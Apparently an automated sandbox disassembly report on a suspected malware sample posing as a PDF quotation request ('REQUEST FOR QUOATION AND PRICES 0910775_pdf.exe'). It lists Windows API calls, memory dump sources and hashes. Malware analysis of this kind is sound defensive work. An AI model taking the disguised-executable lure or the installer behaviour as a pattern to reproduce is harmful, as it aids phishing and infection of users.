                                                                                                                                  • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                                  • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                  • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2979337801-0
                                                                                                                                  • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                  • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                                  • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                  • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                  • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2534807173.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534847436.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2534867013.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                  • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                  • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                  • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                  • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                  • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                  • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                  • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                  • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3677997916-1824292864
                                                                                                                                  • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                  • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                                  • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                  • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 2659869361-823278215
                                                                                                                                  • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                  • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                                  • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                  • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                  • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                  • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                  • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                  • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405AC2
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405B6A
                                                                                                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 3248276644-823278215
                                                                                                                                  • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                  • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                                  • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                  • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405748
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
